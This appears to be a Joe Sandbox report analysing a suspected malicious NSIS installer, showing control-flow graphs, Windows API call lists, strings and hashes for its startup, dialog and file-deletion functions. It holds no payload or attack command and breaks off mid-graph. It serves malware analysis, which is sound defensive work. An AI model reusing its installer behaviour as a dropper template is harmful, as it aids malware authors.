calls 4883->4884 4884->4870 4885->4870 4889 403e1e 4886->4889 4890 403e65 SendMessageW 4886->4890 4891 403e31 4886->4891 4900 403e16 4886->4900 4887->4870 4887->4886 4888 4062a4 17 API calls 4888->4897 4889->4890 4889->4900 4890->4883 4894 403e39 4891->4894 4895 403e4e 4891->4895 4893 404217 18 API calls 4893->4897 4898 40140b 2 API calls 4894->4898 4899 40140b 2 API calls 4895->4899 4896 403e4c 4896->4883 4897->4870 4897->4880 4897->4881 4897->4888 4897->4893 4902 404217 18 API calls 4897->4902 4918 4040e2 DestroyWindow 4897->4918 4898->4900 4901 403e55 4899->4901 4931 4041f0 4900->4931 4901->4883 4901->4900 4903 403fc9 GetDlgItem 4902->4903 4904 403fe6 ShowWindow KiUserCallbackDispatcher 4903->4904 4905 403fde 4903->4905 4928 404239 EnableWindow 4904->4928 4905->4904 4907 404010 EnableWindow 4912 404024 4907->4912 4908 404029 GetSystemMenu EnableMenuItem SendMessageW 4909 404059 SendMessageW 4908->4909 4908->4912 4909->4912 4911 403d1f 18 API calls 4911->4912 4912->4908 4912->4911 4929 40424c SendMessageW 4912->4929 4930 406282 lstrcpynW 4912->4930 4914 404088 lstrlenW 4915 4062a4 17 API calls 4914->4915 4916 40409e SetWindowTextW 4915->4916 4917 401389 2 API calls 4916->4917 4917->4897 4918->4875 4919 4040fc CreateDialogParamW 4918->4919 4919->4875 4920 40412f 4919->4920 4921 404217 18 API calls 4920->4921 4922 40413a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4921->4922 4923 401389 2 API calls 4922->4923 4924 404180 4923->4924 4924->4870 4925 404188 ShowWindow 4924->4925 4926 404263 SendMessageW 4925->4926 4927 4041a0 4926->4927 4927->4875 4928->4907 4929->4912 4930->4914 4932 4041f7 4931->4932 4933 4041fd SendMessageW 4931->4933 4932->4933 4933->4896

                                                          Executed Functions

                                                          Function 00403373 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412stringfilecomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 403373-4033b0 SetErrorMode GetVersion 1 4033b2-4033ba call 40665c 0->1 2 4033c3 0->2 1->2 7 4033bc 1->7 3 4033c8-4033dc call 4065ec lstrlenA 2->3 9 4033de-4033fa call 40665c * 3 3->9 7->2 16 40340b-40346c #17 OleInitialize SHGetFileInfoW call 406282 GetCommandLineW call 406282 GetModuleHandleW 9->16 17 4033fc-403402 9->17 24 403476-403490 call 405b80 CharNextW 16->24 25 40346e-403475 16->25 17->16 21 403404 17->21 21->16 28 403496-40349c 24->28 29 4035a7-4035c1 GetTempPathW call 403342 24->29 25->24 31 4034a5-4034a9 28->31 32 40349e-4034a3 28->32 36 4035c3-4035e1 GetWindowsDirectoryW lstrcatW call 403342 29->36 37 403619-403633 DeleteFileW call 402ec1 29->37 34 4034b0-4034b4 31->34 35 4034ab-4034af 31->35 32->31 32->32 38 403573-403580 call 405b80 34->38 39 4034ba-4034c0 34->39 35->34 36->37 54 4035e3-403613 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403342 36->54 57 4036e4-4036f4 call 4038b6 OleUninitialize 37->57 58 403639-40363f 37->58 55 403582-403583 38->55 56 403584-40358a 38->56 40 4034c2-4034ca 39->40 41 4034db-403514 39->41 45 4034d1 40->45 46 4034cc-4034cf 40->46 47 403531-40356b 41->47 48 403516-40351b 41->48 45->41 46->41 46->45 47->38 53 40356d-403571 47->53 48->47 52 40351d-403525 48->52 62 403527-40352a 52->62 63 40352c 52->63 53->38 64 403592-4035a0 call 406282 53->64 54->37 54->57 55->56 56->28 66 403590 56->66 75 40381a-403820 57->75 76 4036fa-40370a call 4058e4 ExitProcess 57->76 59 4036d4-4036db call 403990 58->59 60 403645-403650 call 405b80 58->60 74 4036e0 59->74 77 403652-403687 60->77 78 40369e-4036a8 60->78 62->47 62->63 63->47 67 4035a5 64->67 66->67 67->29 74->57 80 403822-403838 GetCurrentProcess OpenProcessToken 75->80 81 40389e-4038a6 75->81 82 403689-40368d 77->82 85 403710-403724 call 40584f lstrcatW 78->85 86 4036aa-4036b8 call 405c5b 78->86 88 40383a-403868 LookupPrivilegeValueW AdjustTokenPrivileges 80->88 89 40386e-40387c call 40665c 80->89 83 4038a8 81->83 84 4038ac-4038b0 ExitProcess 81->84 90 403696-40369a 82->90 91 40368f-403694 82->91 83->84 102 403731-40374b lstrcatW lstrcmpiW 85->102 103 403726-40372c lstrcatW 85->103 86->57 101 4036ba-4036d0 call 406282 * 2 86->101 88->89 99 40388a-403895 ExitWindowsEx 89->99 100 40387e-403888 89->100 90->82 96 40369c 90->96 91->90 91->96 96->78 99->81 104 403897-403899 call 40140b 99->104 100->99 100->104 101->59 102->57 106 40374d-403750 102->106 103->102 104->81 107 403752-403757 call 4057b5 106->107 108 403759 call 405832 106->108 117 40375e-40376c SetCurrentDirectoryW 107->117 108->117 118 403779-4037a2 call 406282 117->118 119 40376e-403774 call 406282 117->119 123 4037a7-4037c3 call 4062a4 DeleteFileW 118->123 119->118 126 403804-40380c 123->126 127 4037c5-4037d5 CopyFileW 123->127 126->123 128 40380e-403815 call 406048 126->128 127->126 129 4037d7-4037f7 call 406048 call 4062a4 call 405867 127->129 128->57 129->126 138 4037f9-403800 CloseHandle 129->138 138->126
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 00403396
                                                          • GetVersion.KERNEL32 ref: 0040339C
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                          • OleInitialize.OLE32(00000000), ref: 00403413
                                                          • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                          • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\450707124374000811.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\450707124374000811.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                            • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                            • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035D5
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F1
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                          • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                            • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                          • ExitProcess.KERNEL32 ref: 0040370A
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371D
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                          • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\450707124374000811.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
                                                          • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                          • ExitProcess.KERNEL32 ref: 004038B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                          • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$C:\Users\user\Desktop$C:\Users\user\Desktop\450707124374000811.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 2488574733-1748544714
                                                          • Opcode ID: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                          • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                          • Opcode Fuzzy Hash: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                          • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E
                                                          Function 00404C62 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 139 404c62-404cae GetDlgItem * 2 140 404cb4-404d48 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->140 141 404ecf-404ed6 139->141 142 404d57-404d5e DeleteObject 140->142 143 404d4a-404d55 SendMessageW 140->143 144 404ed8-404ee8 141->144 145 404eea 141->145 147 404d60-404d68 142->147 143->142 146 404eed-404ef6 144->146 145->146 148 404f01-404f07 146->148 149 404ef8-404efb 146->149 150 404d91-404d95 147->150 151 404d6a-404d6d 147->151 155 404f16-404f1d 148->155 156 404f09-404f10 148->156 149->148 152 404fe5-404fec 149->152 150->147 157 404d97-404dc3 call 404217 * 2 150->157 153 404d72-404d8f call 4062a4 SendMessageW * 2 151->153 154 404d6f 151->154 162 40505d-405065 152->162 163 404fee-404ff4 152->163 153->150 154->153 159 404f92-404f95 155->159 160 404f1f-404f22 155->160 156->152 156->155 196 404dc9-404dcf 157->196 197 404e8e-404ea1 GetWindowLongW SetWindowLongW 157->197 159->152 164 404f97-404fa1 159->164 168 404f24-404f2b 160->168 169 404f2d-404f42 call 404bb0 160->169 166 405067-40506d SendMessageW 162->166 167 40506f-405076 162->167 171 405245-405257 call 40427e 163->171 172 404ffa-405004 163->172 174 404fb1-404fbb 164->174 175 404fa3-404faf SendMessageW 164->175 166->167 176 405078-40507f 167->176 177 4050aa-4050b1 167->177 168->159 168->169 169->159 195 404f44-404f55 169->195 172->171 180 40500a-405019 SendMessageW 172->180 174->152 182 404fbd-404fc7 174->182 175->174 183 405081-405082 ImageList_Destroy 176->183 184 405088-40508f 176->184 187 405207-40520e 177->187 188 4050b7-4050c3 call 4011ef 177->188 180->171 189 40501f-405030 SendMessageW 180->189 191 404fd8-404fe2 182->191 192 404fc9-404fd6 182->192 183->184 193 405091-405092 GlobalFree 184->193 194 405098-4050a4 184->194 187->171 190 405210-405217 187->190 214 4050d3-4050d6 188->214 215 4050c5-4050c8 188->215 199 405032-405038 189->199 200 40503a-40503c 189->200 190->171 202 405219-405243 ShowWindow GetDlgItem ShowWindow 190->202 191->152 192->152 193->194 194->177 195->159 204 404f57-404f59 195->204 205 404dd2-404dd9 196->205 203 404ea7-404eab 197->203 199->200 201 40503d-405056 call 401299 SendMessageW 199->201 200->201 201->162 202->171 208 404ec5-404ecd call 40424c 203->208 209 404ead-404ec0 ShowWindow call 40424c 203->209 210 404f5b-404f62 204->210 211 404f6c 204->211 212 404e6f-404e82 205->212 213 404ddf-404e07 205->213 208->141 209->171 224 404f64-404f66 210->224 225 404f68-404f6a 210->225 228 404f6f-404f8b call 40117d 211->228 212->205 219 404e88-404e8c 212->219 226 404e41-404e43 213->226 227 404e09-404e3f SendMessageW 213->227 220 405117-40513b call 4011ef 214->220 221 4050d8-4050f1 call 4012e2 call 401299 214->221 216 4050ca 215->216 217 4050cb-4050ce call 404c30 215->217 216->217 217->214 219->197 219->203 241 405141 220->241 242 4051dd-4051f1 InvalidateRect 220->242 246 405101-405110 SendMessageW 221->246 247 4050f3-4050f9 221->247 224->228 225->228 229 404e45-404e54 SendMessageW 226->229 230 404e56-404e6c SendMessageW 226->230 227->212 228->159 229->212 230->212 243 405144-40514f 241->243 242->187 245 4051f3-405202 call 404b83 call 404b6b 242->245 248 405151-405160 243->248 249 4051c5-4051d7 243->249 245->187 246->220 253 4050fb 247->253 254 4050fc-4050ff 247->254 251 405162-40516f 248->251 252 405173-405176 248->252 249->242 249->243 251->252 256 405178-40517b 252->256 257 40517d-405186 252->257 253->254 254->246 254->247 259 40518b-4051c3 SendMessageW * 2 256->259 257->259 260 405188 257->260 259->249 260->259
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404C7A
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404C85
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404CE2
                                                          • SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
                                                          • DeleteObject.GDI32(00000000), ref: 00404D58
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404E93
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
                                                          • ShowWindow.USER32(?,00000005), ref: 00404EB2
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405082
                                                          • GlobalFree.KERNEL32(?), ref: 00405092
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E3
                                                          • ShowWindow.USER32(?,00000000), ref: 00405231
                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040523C
                                                          • ShowWindow.USER32(00000000), ref: 00405243
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                          • Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
                                                          • Opcode Fuzzy Hash: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                          • Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58
                                                          Function 00405990 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 570 405990-4059b6 call 405c5b 573 4059b8-4059ca DeleteFileW 570->573 574 4059cf-4059d6 570->574 575 405b4c-405b50 573->575 576 4059d8-4059da 574->576 577 4059e9-4059f9 call 406282 574->577 578 4059e0-4059e3 576->578 579 405afa-405aff 576->579 583 405a08-405a09 call 405b9f 577->583 584 4059fb-405a06 lstrcatW 577->584 578->577 578->579 579->575 582 405b01-405b04 579->582 585 405b06-405b0c 582->585 586 405b0e-405b16 call 4065c5 582->586 587 405a0e-405a12 583->587 584->587 585->575 586->575 593 405b18-405b2c call 405b53 call 405948 586->593 591 405a14-405a1c 587->591 592 405a1e-405a24 lstrcatW 587->592 591->592 594 405a29-405a45 lstrlenW FindFirstFileW 591->594 592->594 610 405b44-405b47 call 4052e6 593->610 611 405b2e-405b31 593->611 595 405a4b-405a53 594->595 596 405aef-405af3 594->596 598 405a73-405a87 call 406282 595->598 599 405a55-405a5d 595->599 596->579 601 405af5 596->601 612 405a89-405a91 598->612 613 405a9e-405aa9 call 405948 598->613 602 405ad2-405ae2 FindNextFileW 599->602 603 405a5f-405a67 599->603 601->579 602->595 609 405ae8-405ae9 FindClose 602->609 603->598 606 405a69-405a71 603->606 606->598 606->602 609->596 610->575 611->585 614 405b33-405b42 call 4052e6 call 406048 611->614 612->602 615 405a93-405a9c call 405990 612->615 623 405aca-405acd call 4052e6 613->623 624 405aab-405aae 613->624 614->575 615->602 623->602 627 405ab0-405ac0 call 4052e6 call 406048 624->627 628 405ac2-405ac8 624->628 627->602 628->602
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059B9
                                                          • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A01
                                                          • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A24
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A2A
                                                          • FindFirstFileW.KERNELBASE(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A3A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                          • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                          Strings
                                                          • \*.*, xrefs: 004059FB
                                                          • "C:\Users\user\Desktop\450707124374000811.exe", xrefs: 00405990
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-1362236379
                                                          • Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                          • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                          • Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                          • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                          Function 004065C5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CA4,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004065D0
                                                          • FindClose.KERNEL32(00000000), ref: 004065DC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                          • Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
                                                          • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                          • Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698
                                                          Function 00403D3E Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 261 403d3e-403d50 262 403e91-403ea0 261->262 263 403d56-403d5c 261->263 265 403ea2-403eea GetDlgItem * 2 call 404217 SetClassLongW call 40140b 262->265 266 403eef-403f04 262->266 263->262 264 403d62-403d6b 263->264 267 403d80-403d83 264->267 268 403d6d-403d7a SetWindowPos 264->268 265->266 270 403f44-403f49 call 404263 266->270 271 403f06-403f09 266->271 273 403d85-403d97 ShowWindow 267->273 274 403d9d-403da3 267->274 268->267 279 403f4e-403f69 270->279 276 403f0b-403f16 call 401389 271->276 277 403f3c-403f3e 271->277 273->274 280 403da5-403dba DestroyWindow 274->280 281 403dbf-403dc2 274->281 276->277 292 403f18-403f37 SendMessageW 276->292 277->270 278 4041e4 277->278 286 4041e6-4041ed 278->286 284 403f72-403f78 279->284 285 403f6b-403f6d call 40140b 279->285 287 4041c1-4041c7 280->287 289 403dc4-403dd0 SetWindowLongW 281->289 290 403dd5-403ddb 281->290 295 4041a2-4041bb DestroyWindow EndDialog 284->295 296 403f7e-403f89 284->296 285->284 287->278 294 4041c9-4041cf 287->294 289->286 297 403de1-403df2 GetDlgItem 290->297 298 403e7e-403e8c call 40427e 290->298 292->286 294->278 300 4041d1-4041da ShowWindow 294->300 295->287 296->295 301 403f8f-403fdc call 4062a4 call 404217 * 3 GetDlgItem 296->301 302 403e11-403e14 297->302 303 403df4-403e0b SendMessageW IsWindowEnabled 297->303 298->286 300->278 331 403fe6-404022 ShowWindow KiUserCallbackDispatcher call 404239 EnableWindow 301->331 332 403fde-403fe3 301->332 304 403e16-403e17 302->304 305 403e19-403e1c 302->305 303->278 303->302 308 403e47-403e4c call 4041f0 304->308 309 403e2a-403e2f 305->309 310 403e1e-403e24 305->310 308->298 312 403e65-403e78 SendMessageW 309->312 314 403e31-403e37 309->314 310->312 313 403e26-403e28 310->313 312->298 313->308 317 403e39-403e3f call 40140b 314->317 318 403e4e-403e57 call 40140b 314->318 329 403e45 317->329 318->298 327 403e59-403e63 318->327 327->329 329->308 335 404024-404025 331->335 336 404027 331->336 332->331 337 404029-404057 GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404059-40406a SendMessageW 337->338 339 40406c 337->339 340 